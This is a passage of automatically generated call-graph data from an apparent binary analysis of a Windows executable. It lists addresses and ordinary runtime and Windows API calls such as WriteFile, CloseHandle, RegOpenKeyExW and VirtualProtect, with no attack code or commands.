101827->101828 101829 33d89f 101827->101829 101831 33d955 101828->101831 101833 33d8ca 101828->101833 101927 338af4 58 API calls __getptd_noexit 101829->101927 101933 338af4 58 API calls __getptd_noexit 101831->101933 101832 33d8a4 101928 338b28 58 API calls __getptd_noexit 101832->101928 101836 33d8f2 101833->101836 101837 33d8e8 101833->101837 101854 33d206 101836->101854 101929 338af4 58 API calls __getptd_noexit 101837->101929 101838 33d8ed 101934 338b28 58 API calls __getptd_noexit 101838->101934 101839 33d8ab type_info::_Type_info_dtor 101839->101790 101842 33d8f8 101844 33d90b 101842->101844 101845 33d91e 101842->101845 101863 33d975 101844->101863 101930 338b28 58 API calls __getptd_noexit 101845->101930 101846 33d961 101935 338db6 9 API calls __filbuf 101846->101935 101850 33d923 101931 338af4 58 API calls __getptd_noexit 101850->101931 101851 33d917 101932 33d94d LeaveCriticalSection __unlock_fhandle 101851->101932 101855 33d212 type_info::_Type_info_dtor 101854->101855 101856 33d261 EnterCriticalSection 101855->101856 101857 339c0b __lock 58 API calls 101855->101857 101858 33d287 type_info::_Type_info_dtor 101856->101858 101859 33d237 101857->101859 101858->101842 101860 33d24f 101859->101860 101861 339e2b __ioinit InitializeCriticalSectionAndSpinCount 101859->101861 101862 33d28b ___lock_fhandle LeaveCriticalSection 101860->101862 101861->101860 101862->101856 101864 33d982 __write_nolock 101863->101864 101865 33d9b6 101864->101865 101866 33d9c1 101864->101866 101867 33d9e0 101864->101867 101869 33c5f6 __NMSG_WRITE 6 API calls 101865->101869 101868 338af4 __commit 58 API calls 101866->101868 101871 33da38 101867->101871 101872 33da1c 101867->101872 101870 33d9c6 101868->101870 101873 33e1d6 101869->101873 101874 338b28 __filbuf 58 API calls 101870->101874 101875 33da51 101871->101875 101878 3418c1 __lseeki64_nolock 60 API calls 101871->101878 101876 338af4 __commit 58 API calls 101872->101876 101873->101851 101877 33d9cd 101874->101877 101879 345c6b __flsbuf 58 API calls 101875->101879 101880 33da21 101876->101880 101881 338db6 __filbuf 9 API calls 101877->101881 101878->101875 101882 33da5f 101879->101882 101883 338b28 __filbuf 58 API calls 101880->101883 101881->101865 101884 33ddb8 101882->101884 101889 3399ac ____lc_codepage_func 58 API calls 101882->101889 101885 33da28 101883->101885 101886 33ddd6 101884->101886 101887 33e14b WriteFile 101884->101887 101888 338db6 __filbuf 9 API calls 101885->101888 101890 33defa 101886->101890 101899 33ddec 101886->101899 101891 33ddab GetLastError 101887->101891 101892 33dd78 101887->101892 101888->101865 101893 33da8b GetConsoleMode 101889->101893 101901 33df05 101890->101901 101904 33dfef 101890->101904 101891->101892 101892->101865 101894 33e184 101892->101894 101903 33ded8 101892->101903 101893->101884 101895 33daca 101893->101895 101894->101865 101897 338b28 __filbuf 58 API calls 101894->101897 101895->101884 101898 33dada GetConsoleCP 101895->101898 101896 33de5b WriteFile 101896->101891 101900 33de98 101896->101900 101902 33e1b2 101897->101902 101898->101894 101922 33db09 101898->101922 101899->101894 101899->101896 101900->101899 101906 33debc 101900->101906 101901->101894 101907 33df6a WriteFile 101901->101907 101908 338af4 __commit 58 API calls 101902->101908 101909 33dee3 101903->101909 101910 33e17b 101903->101910 101904->101894 101905 33e064 WideCharToMultiByte 101904->101905 101905->101891 101919 33e0ab 101905->101919 101906->101892 101907->101891 101911 33dfb9 101907->101911 101908->101865 101912 338b28 __filbuf 58 API calls 101909->101912 101913 338b07 __dosmaperr 58 API calls 101910->101913 101911->101892 101911->101901 101911->101906 101915 33dee8 101912->101915 101913->101865 101914 33e0b3 WriteFile 101917 33e106 GetLastError 101914->101917 101914->101919 101918 338af4 __commit 58 API calls 101915->101918 101916 3335f5 __write_nolock 58 API calls 101916->101922 101917->101919 101918->101865 101919->101892 101919->101904 101919->101906 101919->101914 101920 3462ba 60 API calls __write_nolock 101920->101922 101921 347a5e WriteConsoleW CreateFileW __putwch_nolock 101925 33dc5f 101921->101925 101922->101892 101922->101916 101922->101920 101923 33dbf2 WideCharToMultiByte 101922->101923 101922->101925 101923->101892 101924 33dc2d WriteFile 101923->101924 101924->101891 101924->101925 101925->101891 101925->101892 101925->101921 101925->101922 101926 33dc87 WriteFile 101925->101926 101926->101891 101926->101925 101927->101832 101928->101839 101929->101838 101930->101850 101931->101851 101932->101839 101933->101838 101934->101846 101935->101839 101959 33d4c3 101936->101959 101938 340b41 101972 33d43d 59 API calls 2 library calls 101938->101972 101940 340aeb 101940->101938 101943 33d4c3 __commit 58 API calls 101940->101943 101950 340b1f 101940->101950 101941 33d4c3 __commit 58 API calls 101944 340b2b CloseHandle 101941->101944 101942 340b49 101945 340b6b 101942->101945 101973 338b07 58 API calls 3 library calls 101942->101973 101946 340b16 101943->101946 101944->101938 101947 340b37 GetLastError 101944->101947 101945->101822 101949 33d4c3 __commit 58 API calls 101946->101949 101947->101938 101949->101950 101950->101938 101950->101941 101951->101804 101952->101821 101953->101810 101954->101822 101955->101821 101956->101810 101957->101815 101958->101821 101960 33d4e3 101959->101960 101961 33d4ce 101959->101961 101964 338af4 __commit 58 API calls 101960->101964 101966 33d508 101960->101966 101962 338af4 __commit 58 API calls 101961->101962 101963 33d4d3 101962->101963 101965 338b28 __filbuf 58 API calls 101963->101965 101967 33d512 101964->101967 101968 33d4db 101965->101968 101966->101940 101969 338b28 __filbuf 58 API calls 101967->101969 101968->101940 101970 33d51a 101969->101970 101971 338db6 __filbuf 9 API calls 101970->101971 101971->101968 101972->101942 101973->101945 102036 341940 101974->102036 101977 314799 102042 317d8c 101977->102042 101978 31477c 101979 317bcc 59 API calls 101978->101979 101981 314788 101979->101981 102038 317726 101981->102038 101984 330791 101985 341940 __write_nolock 101984->101985 101986 33079e GetLongPathNameW 101985->101986 101987 317bcc 59 API calls 101986->101987 101988 3172bd 101987->101988 101989 31700b 101988->101989 101990 317667 59 API calls 101989->101990 101991 31701d 101990->101991 101992 314750 60 API calls 101991->101992 101993 317028 101992->101993 101994 34e885 101993->101994 101995 317033 101993->101995 102000 34e89f 101994->102000 102052 317908 61 API calls 101994->102052 101997 313f74 59 API calls 101995->101997 101998 31703f 101997->101998 102046 3134c2 101998->102046 102001 317052 Mailbox 102001->100910 102003 314ddd 136 API calls 102002->102003 102004 31688f 102003->102004 102005 34e031 102004->102005 102006 314ddd 136 API calls 102004->102006 102007 37955b 122 API calls 102005->102007 102008 3168a3 102006->102008 102009 34e046 102007->102009 102008->102005 102010 3168ab 102008->102010 102011 34e067 102009->102011 102012 34e04a 102009->102012 102014 34e052 102010->102014 102015 3168b7 102010->102015 102013 330db6 Mailbox 59 API calls 102011->102013 102016 314e4a 84 API calls 102012->102016 102035 34e0ac Mailbox 102013->102035 102146 3742f8 90 API calls _wprintf 102014->102146 102053 316a8c 102015->102053 102016->102014 102019 34e060 102019->102011 102021 34e260 102022 332d55 _free 58 API calls 102021->102022 102023 34e268 102022->102023 102024 314e4a 84 API calls 102023->102024 102029 34e271 102024->102029 102028 332d55 _free 58 API calls 102028->102029 102029->102028 102031 314e4a 84 API calls 102029->102031 102152 36f7a1 89 API calls 4 library calls 102029->102152 102031->102029 102032 317de1 59 API calls 102032->102035 102035->102021 102035->102029 102035->102032 102147 36f73d 59 API calls 2 library calls 102035->102147 102148 36f65e 61 API calls 2 library calls 102035->102148 102149 37737f 59 API calls Mailbox 102035->102149 102150 31750f 59 API calls 2 library calls 102035->102150 102151 31735d 59 API calls Mailbox 102035->102151 102037 31475d GetFullPathNameW 102036->102037 102037->101977 102037->101978 102039 317734 102038->102039 102040 317d2c 59 API calls 102039->102040 102041 314794 102040->102041 102041->101984 102043 317da6 102042->102043 102044 317d99 102042->102044 102045 330db6 Mailbox 59 API calls 102043->102045 102044->101981 102045->102044 102047 3134d4 102046->102047 102051 3134f3 _memmove 102046->102051 102049 330db6 Mailbox 59 API calls 102047->102049 102048 330db6 Mailbox 59 API calls 102050 31350a 102048->102050 102049->102051 102050->102001 102051->102048 102052->101994 102054 316ab5 102053->102054 102055 34e41e 102053->102055 102158 3157a6 60 API calls Mailbox 102054->102158 102225 36f7a1 89 API calls 4 library calls 102055->102225 102058 316ad7 102159 3157f6 67 API calls 102058->102159 102059 34e431 102226 36f7a1 89 API calls 4 library calls 102059->102226 102061 316aec 102061->102059 102062 316af4 102061->102062 102064 317667 59 API calls 102062->102064 102066 316b00 102064->102066 102065 34e44d 102068 316b61 102065->102068 102160 330957 60 API calls __write_nolock 102066->102160 102069 34e460 102068->102069 102070 316b6f 102068->102070 102072 315c6f CloseHandle 102069->102072 102073 317667 59 API calls 102070->102073 102071 316b0c 102074 317667 59 API calls 102071->102074 102075 34e46c 102072->102075 102076 316b78 102073->102076 102077 316b18 102074->102077 102078 314ddd 136 API calls 102075->102078 102079 317667 59 API calls 102076->102079 102080 314750 60 API calls 102077->102080 102081 34e488 102078->102081 102082 316b81 102079->102082 102083 316b26 102080->102083 102084 34e4b1 102081->102084 102088 37955b 122 API calls 102081->102088 102163 31459b 102082->102163 102161 315850 ReadFile SetFilePointerEx 102083->102161 102227 36f7a1 89 API calls 4 library calls 102084->102227 102087 316b52 102162 315aee SetFilePointerEx SetFilePointerEx 102087->102162 102092 34e4a4 102088->102092 102089 316b98 102093 317b2e 59 API calls 102089->102093 102095 34e4ac 102092->102095 102096 34e4cd 102092->102096 102097 316ba9 SetCurrentDirectoryW 102093->102097 102094 34e4c8 102102 316d0c Mailbox 102094->102102 102098 314e4a 84 API calls 102095->102098 102099 314e4a 84 API calls 102096->102099 102103 316bbc Mailbox 102097->102103 102098->102084 102100 34e4d2 102099->102100 102101 330db6 Mailbox 59 API calls 102100->102101 102109 34e506 102101->102109 102153 3157d4 102102->102153 102104 330db6 Mailbox 59 API calls 102103->102104 102107 316bcf 102104->102107 102106 313bbb 102106->100777 102106->100799 102108 31522e 59 API calls 102107->102108 102134 316bda Mailbox __NMSG_WRITE 102108->102134 102228 31750f 59 API calls 2 library calls 102109->102228 102111 316ce7 102221 315c6f 102111->102221 102114 34e740 102234 3772df 59 API calls Mailbox 102114->102234 102115 316cf3 SetCurrentDirectoryW 102115->102102 102118 34e762 102235 38fbce 59 API calls 2 library calls 102118->102235 102121 34e76f 102123 332d55 _free 58 API calls 102121->102123 102122 34e7d9 102238 36f7a1 89 API calls 4 library calls 102122->102238 102123->102102 102126 34e7f2 102126->102111 102129 34e7d1 102237 36f5f7 59 API calls 4 library calls 102129->102237 102130 34e54f Mailbox 102130->102114 102137 317de1 59 API calls 102130->102137 102141 34e792 102130->102141 102229 36f73d 59 API calls 2 library calls 102130->102229 102230 36f65e 61 API calls 2 library calls 102130->102230 102231 37737f 59 API calls Mailbox 102130->102231 102232 31750f 59 API calls 2 library calls 102130->102232 102233 317213 59 API calls Mailbox 102130->102233 102132 317de1 59 API calls 102132->102134 102134->102111 102134->102122 102134->102129 102134->102132 102214 31586d 67 API calls _wcscpy 102134->102214 102215 316f5d GetStringTypeW 102134->102215 102216 316ecc 60 API calls __wcsnicmp 102134->102216 102217 316faa GetStringTypeW __NMSG_WRITE 102134->102217 102218 33363d GetStringTypeW _iswctype 102134->102218 102219 3168dc 165 API calls 3 library calls 102134->102219 102220 317213 59 API calls Mailbox 102134->102220 102137->102130 102236 36f7a1 89 API calls 4 library calls 102141->102236 102143 34e7ab 102144 332d55 _free 58 API calls 102143->102144 102145 34e7be 102144->102145 102145->102102 102146->102019 102147->102035 102148->102035 102149->102035 102150->102035 102151->102035 102152->102029 102154 315c6f CloseHandle 102153->102154 102155 3157dc Mailbox 102154->102155 102156 315c6f CloseHandle 102155->102156 102157 3157eb 102156->102157 102157->102106 102158->102058 102159->102061 102160->102071 102161->102087 102162->102068 102164 317667 59 API calls 102163->102164 102165 3145b1 102164->102165 102166 317667 59 API calls 102165->102166 102167 3145b9 102166->102167 102168 317667 59 API calls 102167->102168 102169 3145c1 102168->102169 102170 317667 59 API calls 102169->102170 102171 3145c9 102170->102171 102172 34d4d2 102171->102172 102173 3145fd 102171->102173 102174 318047 59 API calls 102172->102174 102175 31784b 59 API calls 102173->102175 102176 34d4db 102174->102176 102177 31460b 102175->102177 102178 317d8c 59 API calls 102176->102178 102179 317d2c 59 API calls 102177->102179 102181 314640 102178->102181 102180 314615 102179->102180 102180->102181 102182 31784b 59 API calls 102180->102182 102183 314680 102181->102183 102185 31465f 102181->102185 102196 34d4fb 102181->102196 102186 314636 102182->102186 102239 31784b 102183->102239 102187 3179f2 59 API calls 102185->102187 102190 317d2c 59 API calls 102186->102190 102191 314669 102187->102191 102188 314691 102192 3146a3 102188->102192 102194 318047 59 API calls 102188->102194 102189 34d5cb 102193 317bcc 59 API calls 102189->102193 102190->102181 102191->102183 102198 31784b 59 API calls 102191->102198 102195 3146b3 102192->102195 102199 318047 59 API calls 102192->102199 102213 34d588 102193->102213 102194->102192 102197 3146ba 102195->102197 102200 318047 59 API calls 102195->102200 102196->102189 102202 34d5b4 102196->102202 102210 34d532 102196->102210 102201 318047 59 API calls 102197->102201 102209 3146c1 Mailbox 102197->102209 102198->102183 102199->102195 102200->102197 102201->102209 102202->102189 102204 34d59f 102202->102204 102203 34d590 102205 317bcc 59 API calls 102203->102205 102206 317bcc 59 API calls 102204->102206 102205->102213 102206->102213 102207 3179f2 59 API calls 102207->102213 102209->102089 102210->102203 102211 34d57b 102210->102211 102212 317bcc 59 API calls 102211->102212 102212->102213 102213->102183 102213->102207 102252 317924 59 API calls 2 library calls 102213->102252 102214->102134 102215->102134 102216->102134 102217->102134 102218->102134 102219->102134 102220->102134 102222 315c79 102221->102222 102223 315c88 102221->102223 102222->102115 102223->102222 102224 315c8d CloseHandle 102223->102224 102224->102222 102225->102059 102226->102065 102227->102094 102228->102130 102229->102130 102230->102130 102231->102130 102232->102130 102233->102130 102234->102118 102235->102121 102236->102143 102237->102122 102238->102126 102240 3178b7 102239->102240 102241 31785a 102239->102241 102242 317d2c 59 API calls 102240->102242 102241->102240 102243 317865 102241->102243 102249 317888 _memmove 102242->102249 102244 317880 102243->102244 102245 34eb09 102243->102245 102253 317f27 59 API calls Mailbox 102244->102253 102246 318029 59 API calls 102245->102246 102248 34eb13 102246->102248 102250 330db6 Mailbox 59 API calls 102248->102250 102249->102188 102251 34eb33 102250->102251 102252->102213 102253->102249 102255 316d95 102254->102255 102259 316ea9 102254->102259 102256 330db6 Mailbox 59 API calls 102255->102256 102255->102259 102258 316dbc 102256->102258 102257 330db6 Mailbox 59 API calls 102260 316e31 102257->102260 102258->102257 102259->100916 102260->102259 102267 316240 102260->102267 102292 31735d 59 API calls Mailbox 102260->102292 102293 366553 59 API calls Mailbox 102260->102293 102294 31750f 59 API calls 2 library calls 102260->102294 102265->100918 102266->100920 102268 317a16 59 API calls 102267->102268 102286 316265 102268->102286 102269 31646a 102297 31750f 59 API calls 2 library calls 102269->102297 102271 316484 Mailbox 102271->102260 102274 34dff6 102300 36f8aa 91 API calls 4 library calls 102274->102300 102275 31750f 59 API calls 102275->102286 102279 34e004 102301 31750f 59 API calls 2 library calls 102279->102301 102280 317d8c 59 API calls 102280->102286 102282 34e01a 102282->102271 102283 316799 _memmove 102302 36f8aa 91 API calls 4 library calls 102283->102302 102284 34df92 102285 318029 59 API calls 102284->102285 102287 34df9d 102285->102287 102286->102269 102286->102274 102286->102275 102286->102280 102286->102283 102286->102284 102289 317e4f 59 API calls 102286->102289 102295 315f6c 60 API calls 102286->102295 102296 315d41 59 API calls Mailbox 102286->102296 102298 315e72 60 API calls 102286->102298 102299 317924 59 API calls 2 library calls 102286->102299 102291 330db6 Mailbox 59 API calls 102287->102291 102290 31643b CharUpperBuffW 102289->102290 102290->102286 102291->102283 102292->102260 102293->102260 102294->102260 102295->102286 102296->102286 102297->102271 102298->102286 102299->102286 102300->102279 102301->102282 102302->102271 102303->100934 102304->100935 102306 31e6d5 102305->102306 102307 353aa9 102306->102307 102310 31e73f 102306->102310 102319 31e799 102306->102319 102396 319ea0 102307->102396 102313 317667 59 API calls 102310->102313 102310->102319 102311 317667 59 API calls 102311->102319 102314 353b04 102313->102314 102316 332d40 __cinit 67 API calls 102314->102316 102315 332d40 __cinit 67 API calls 102315->102319 102316->102319 102317 353b26 102317->100975 102318 3184c0 69 API calls 102335 31e970 Mailbox 102318->102335 102319->102311 102319->102315 102319->102317 102320 31e95a 102319->102320 102319->102335 102320->102335 102421 379e4a 89 API calls 4 library calls 102320->102421 102321 319ea0 331 API calls 102321->102335 102325 379e4a 89 API calls 102325->102335 102328 318d40 59 API calls 102328->102335 102333 31f195 102334 31ea78 102334->100975 102335->102318 102335->102321 102335->102325 102335->102328 102335->102333 102335->102334 102395 317f77 59 API calls 2 library calls 102335->102395 102422 366e8f 59 API calls 102335->102422 102423 38c5c3 331 API calls 102335->102423 102424 38b53c 331 API calls Mailbox 102335->102424 102426 319c90 59 API calls Mailbox 102335->102426 102427 3893c6 331 API calls Mailbox 102335->102427 102337 31f650 102336->102337 102338 31f4ba 102336->102338 102341 317de1 59 API calls 102337->102341 102339 31f4c6 102338->102339 102340 35441e 102338->102340 102526 31f290 331 API calls 2 library calls 102339->102526 102528 38bc6b 331 API calls Mailbox 102340->102528 102347 31f58c Mailbox 102341->102347 102344 35442c 102348 31f630 102344->102348 102529 379e4a 89 API calls 4 library calls 102344->102529 102346 31f4fd 102346->102344 102346->102347 102346->102348 102353 314e4a 84 API calls 102347->102353 102434 38445a 102347->102434 102443 373c37 102347->102443 102446 37cb7a 102347->102446 102348->100975 102350 31f5e3 102350->102348 102353->102350 102355->100975 102356->100975 102357->100975 102358->100944 102359->100949 102360->100975 102361->100950 102362->100950 102363->100950 102364->100975 102365->100975 102366->100975 102368 319851 102367->102368 102377 31984b 102367->102377 102369 319899 102368->102369 102370 34f4da 102368->102370 102371 34f5d3 __i64tow 102368->102371 102373 319857 __itow 102368->102373 102655 333698 83 API calls 3 library calls 102369->102655 102378 330db6 Mailbox 59 API calls 102370->102378 102384 34f552 Mailbox _wcscpy 102370->102384 102371->102371 102375 330db6 Mailbox 59 API calls 102373->102375 102376 319871 102375->102376 102376->102377 102379 317de1 59 API calls 102376->102379 102377->100975 102380 34f51f 102378->102380 102379->102377 102381 330db6 Mailbox 59 API calls 102380->102381 102656 333698 83 API calls 3 library calls 102384->102656 102385->100975 102386->100975 102387->100975 102388->100983 102389->100983 102390->100983 102391->100983 102392->100983 102393->100983 102394->100983 102395->102335 102397 319ebf 102396->102397 102416 319eed Mailbox 102396->102416 102399 31b47a 102403 350055 102399->102403 102400 31b475 102402 317667 59 API calls 102402->102416 102408 330db6 59 API calls Mailbox 102408->102416 102410 318047 59 API calls 102410->102416 102412 332d40 67 API calls __cinit 102412->102416 102413 366e8f 59 API calls 102413->102416 102414 31a057 102415 3509d6 102416->102399 102416->102400 102416->102402 102416->102403 102416->102408 102416->102410 102416->102412 102416->102413 102416->102414 102416->102415 102419 31a55a 102416->102419 102428 31c8c0 331 API calls 2 library calls 102416->102428 102429 31b900 60 API calls Mailbox 102416->102429 102421->102335 102422->102335 102423->102335 102424->102335 102426->102335 102427->102335 102428->102416 102429->102416 102435 319837 84 API calls 102434->102435 102531 37445a GetFileAttributesW 102443->102531 102526->102346 102528->102344 102529->102348 102655->102373 102656->102371 102657 311016 102662 314974 102657->102662 102660 332d40 __cinit 67 API calls 102661 311025 102660->102661 102663 330db6 Mailbox 59 API calls 102662->102663 102664 31497c 102663->102664 102666 31101b 102664->102666 102669 314936 102664->102669 102666->102660 102670 31493f 102669->102670 102672 314951 102669->102672 102671 332d40 __cinit 67 API calls 102670->102671 102671->102672 102673 3149a0 102672->102673 102674 317667 59 API calls 102673->102674 102675 3149b8 GetVersionExW 102674->102675 102676 317bcc 59 API calls 102675->102676 102677 3149fb 102676->102677 102678 317d2c 59 API calls 102677->102678 102683 314a28 102677->102683 102679 314a1c 102678->102679 102680 317726 59 API calls 102679->102680 102680->102683 102681 314a93 GetCurrentProcess IsWow64Process 102682 314aac 102681->102682 102685 314ac2 102682->102685 102686 314b2b GetSystemInfo 102682->102686 102683->102681 102684 34d864 102683->102684 102697 314b37 102685->102697 102687 314af8 102686->102687 102687->102666 102690 314ad4 102693 314b37 2 API calls 102690->102693 102691 314b1f GetSystemInfo 102692 314ae9 102691->102692 102692->102687 102695 314aef FreeLibrary 102692->102695 102694 314adc GetNativeSystemInfo 102693->102694 102694->102692 102695->102687 102698 314ad0 102697->102698 102699 314b40 LoadLibraryA 102697->102699 102698->102690 102698->102691 102699->102698 102700 314b51 GetProcAddress 102699->102700 102700->102698 102701 311066 102706 31f76f 102701->102706 102703 31106c 102704 332d40 __cinit 67 API calls 102703->102704 102705 311076 102704->102705 102707 31f790 102706->102707 102739 32ff03 102707->102739 102711 31f7d7 102712 317667 59 API calls 102711->102712 102713 31f7e1 102712->102713 102714 317667 59 API calls 102713->102714 102715 31f7eb 102714->102715 102716 317667 59 API calls 102715->102716 102717 31f7f5 102716->102717 102718 317667 59 API calls 102717->102718 102719 31f833 102718->102719 102720 317667 59 API calls 102719->102720 102721 31f8fe 102720->102721 102749 325f87 102721->102749 102725 31f930 102726 317667 59 API calls 102725->102726 102727 31f93a 102726->102727 102777 32fd9e 102727->102777 102729 31f981 102730 31f991 GetStdHandle 102729->102730 102731 31f9dd 102730->102731 102732 3545ab 102730->102732 102733 31f9e5 OleInitialize 102731->102733 102732->102731 102734 3545b4 102732->102734 102733->102703 102784 376b38 64 API calls Mailbox 102734->102784 102736 3545bb 102785 377207 CreateThread 102736->102785 102738 3545c7 CloseHandle 102738->102733 102786 32ffdc 102739->102786 102742 32ffdc 59 API calls 102743 32ff45 102742->102743 102744 317667 59 API calls 102743->102744 102745 32ff51 102744->102745 102746 317bcc 59 API calls 102745->102746 102747 31f796 102746->102747 102748 330162 6 API calls 102747->102748 102748->102711 102750 317667 59 API calls 102749->102750 102751 325f97 102750->102751 102752 317667 59 API calls 102751->102752 102753 325f9f 102752->102753 102793 325a9d 102753->102793 102756 325a9d 59 API calls 102757 325faf 102756->102757 102758 317667 59 API calls 102757->102758 102759 325fba 102758->102759 102760 330db6 Mailbox 59 API calls 102759->102760 102761 31f908 102760->102761 102762 3260f9 102761->102762 102763 326107 102762->102763 102764 317667 59 API calls 102763->102764 102765 326112 102764->102765 102766 317667 59 API calls 102765->102766 102767 32611d 102766->102767 102768 317667 59 API calls 102767->102768 102769 326128 102768->102769 102770 317667 59 API calls 102769->102770 102771 326133 102770->102771 102772 325a9d 59 API calls 102771->102772 102773 32613e 102772->102773 102774 330db6 Mailbox 59 API calls 102773->102774 102775 326145 RegisterWindowMessageW 102774->102775 102775->102725 102778 36576f 102777->102778 102779 32fdae 102777->102779 102796 379ae7 60 API calls 102778->102796 102780 330db6 Mailbox 59 API calls 102779->102780 102783 32fdb6 102780->102783 102782 36577a 102783->102729 102784->102736 102785->102738 102797 3771ed 65 API calls 102785->102797 102787 317667 59 API calls 102786->102787 102788 32ffe7 102787->102788 102789 317667 59 API calls 102788->102789 102790 32ffef 102789->102790 102791 317667 59 API calls 102790->102791 102792 32ff3b 102791->102792 102792->102742 102794 317667 59 API calls 102793->102794 102795 325aa5 102794->102795 102795->102756 102796->102782 102798 34fdfc 102831 31ab30 Mailbox _memmove 102798->102831 102800 35085c 102822 31a057 102800->102822 102866 36617e 59 API calls Mailbox 102800->102866 102804 31b525 102865 379e4a 89 API calls 4 library calls 102804->102865 102806 350055 102864 379e4a 89 API calls 4 library calls 102806->102864 102809 31b475 102816 318047 59 API calls 102809->102816 102811 350064 102812 330db6 59 API calls Mailbox 102825 319f37 Mailbox 102812->102825 102813 318047 59 API calls 102813->102825 102816->102822 102817 31b47a 102817->102806 102827 3509e5 102817->102827 102819 317667 59 API calls 102819->102825 102820 366e8f 59 API calls 102820->102825 102821 332d40 67 API calls __cinit 102821->102825 102823 317de1 59 API calls 102823->102831 102824 3509d6 102870 379e4a 89 API calls 4 library calls 102824->102870 102825->102806 102825->102809 102825->102812 102825->102813 102825->102817 102825->102819 102825->102820 102825->102821 102825->102822 102825->102824 102828 31a55a 102825->102828 102853 31c8c0 331 API calls 2 library calls 102825->102853 102854 31b900 60 API calls Mailbox 102825->102854 102871 379e4a 89 API calls 4 library calls 102827->102871 102869 379e4a 89 API calls 4 library calls 102828->102869 102831->102800 102831->102804 102831->102822 102831->102823 102831->102825 102833 319ea0 331 API calls 102831->102833 102834 35086a 102831->102834 102836 350878 102831->102836 102838 31b21c 102831->102838 102840 330db6 59 API calls Mailbox 102831->102840 102843 31b2b6 102831->102843 102844 366e8f 59 API calls 102831->102844 102847 38df23 102831->102847 102850 38df37 102831->102850 102855 319c90 59 API calls Mailbox 102831->102855 102859 38c193 85 API calls 2 library calls 102831->102859 102860 38c2e0 96 API calls Mailbox 102831->102860 102861 377956 59 API calls Mailbox 102831->102861 102862 38bc6b 331 API calls Mailbox 102831->102862 102863 36617e 59 API calls Mailbox 102831->102863 102833->102831 102867 319c90 59 API calls Mailbox 102834->102867 102868 379e4a 89 API calls 4 library calls 102836->102868 102856 319d3c 60 API calls Mailbox 102838->102856 102840->102831 102841 31b22d 102857 319d3c 60 API calls Mailbox 102841->102857 102858 31f6a3 331 API calls 102843->102858 102844->102831 102872 38cadd 102847->102872 102849 38df33 102849->102831 102851 38cadd 130 API calls 102850->102851 102852 38df47 102851->102852 102852->102831 102853->102825 102854->102825 102855->102831 102856->102841 102857->102843 102858->102804 102859->102831 102860->102831 102861->102831 102862->102831 102863->102831 102864->102811 102865->102800 102866->102822 102867->102800 102868->102800 102869->102822 102870->102827 102871->102822 102873 319837 84 API calls 102872->102873 102874 38cb1a 102873->102874 102888 38cb61 Mailbox 102874->102888 102910 38d7a5 102874->102910 102876 38cf2e 102949 38d8c8 92 API calls Mailbox 102876->102949 102879 38cf3d 102881 38cdc7 102879->102881 102882 38cf49 102879->102882 102880 319837 84 API calls 102889 38cbb2 Mailbox 102880->102889 102923 38c96e 102881->102923 102882->102888 102887 38ce00 102938 330c08 102887->102938 102888->102849 102889->102880 102889->102888 102897 38cdb9 102889->102897 102942 38fbce 59 API calls 2 library calls 102889->102942 102943 38cfdf 61 API calls 2 library calls 102889->102943 102892 38ce1a 102944 379e4a 89 API calls 4 library calls 102892->102944 102893 38ce33 102895 3192ce 59 API calls 102893->102895 102898 38ce3f 102895->102898 102896 38ce25 GetCurrentProcess TerminateProcess 102896->102893 102897->102876 102897->102881 102899 319050 59 API calls 102898->102899 102900 38ce55 102899->102900 102909 38ce7c 102900->102909 102945 318d40 59 API calls Mailbox 102900->102945 102901 38cfa4 102901->102888 102906 38cfb8 FreeLibrary 102901->102906 102903 38ce6b 102946 38d649 107 API calls _free 102903->102946 102906->102888 102909->102901 102947 318d40 59 API calls Mailbox 102909->102947 102948 319d3c 60 API calls Mailbox 102909->102948 102950 38d649 107 API calls _free 102909->102950 102911 317e4f 59 API calls 102910->102911 102912 38d7c0 CharLowerBuffW 102911->102912 102951 36f167 102912->102951 102916 317667 59 API calls 102917 38d7f9 102916->102917 102918 31784b 59 API calls 102917->102918 102919 38d810 102918->102919 102920 317d2c 59 API calls 102919->102920 102921 38d81c Mailbox 102920->102921 102922 38d858 Mailbox 102921->102922 102958 38cfdf 61 API calls 2 library calls 102921->102958 102922->102889 102924 38c989 102923->102924 102928 38c9de 102923->102928 102925 330db6 Mailbox 59 API calls 102924->102925 102927 38c9ab 102925->102927 102926 330db6 Mailbox 59 API calls 102926->102927 102927->102926 102927->102928 102929 38da50 102928->102929 102930 38dc79 Mailbox 102929->102930 102937 38da73 _strcat _wcscpy __NMSG_WRITE 102929->102937 102930->102887 102931 319b3c 59 API calls 102931->102937 102932 319b98 59 API calls 102932->102937 102933 319be6 59 API calls 102933->102937 102934 33571c 58 API calls __malloc_crt 102934->102937 102935 319837 84 API calls 102935->102937 102937->102930 102937->102931 102937->102932 102937->102933 102937->102934 102937->102935 102961 375887 61 API calls 2 library calls 102937->102961 102940 330c1d 102938->102940 102939 330cb5 VirtualProtect 102941 330c83 102939->102941 102940->102939 102940->102941 102941->102892 102941->102893 102942->102889 102943->102889 102944->102896 102945->102903 102946->102909 102947->102909 102948->102909 102949->102879 102950->102909 102952 36f192 __NMSG_WRITE 102951->102952 102953 36f1d1 102952->102953 102955 36f1c7 102952->102955 102957 36f278 102952->102957 102953->102916 102953->102921 102955->102953 102959 3178c4 61 API calls 102955->102959 102957->102953 102960 3178c4 61 API calls 102957->102960 102958->102922 102959->102955 102960->102957 102961->102937 102962 35416f 102966 365fe6 102962->102966 102964 35417a 102965 365fe6 85 API calls 102964->102965 102965->102964 102970 365ff3 102966->102970 102976 366020 102966->102976 102967 366022 102978 319328 84 API calls Mailbox 102967->102978 102968 366027 102971 319837 84 API calls 102968->102971 102970->102967 102970->102968 102974 36601a 102970->102974 102970->102976 102972 36602e 102971->102972 102973 317b2e 59 API calls 102972->102973 102973->102976 102977 3195a0 59 API calls _wcsstr 102974->102977 102976->102964 102977->102976 102978->102968 102979 31107d 102984 31708b 102979->102984 102981 31108c 102982 332d40 __cinit 67 API calls 102981->102982 102983 311096 102982->102983 102985 31709b __write_nolock 102984->102985 102986 317667 59 API calls 102985->102986 102987 317151 102986->102987 102988 314706 61 API calls 102987->102988 102989 31715a 102988->102989 103015 33050b 102989->103015 102992 317cab 59 API calls 102993 317173 102992->102993 102994 313f74 59 API calls 102993->102994 102995 317182 102994->102995 102996 317667 59 API calls 102995->102996 102997 31718b 102996->102997 102998 317d8c 59 API calls 102997->102998 102999 317194 RegOpenKeyExW 102998->102999 103000 34e8b1 RegQueryValueExW 102999->103000 103004 3171b6 Mailbox 102999->103004 103001 34e943 RegCloseKey 103000->103001 103002 34e8ce 103000->103002 103001->103004 103014 34e955 _wcscat Mailbox __NMSG_WRITE 103001->103014 103003 330db6 Mailbox 59 API calls 103002->103003 103005 34e8e7 103003->103005 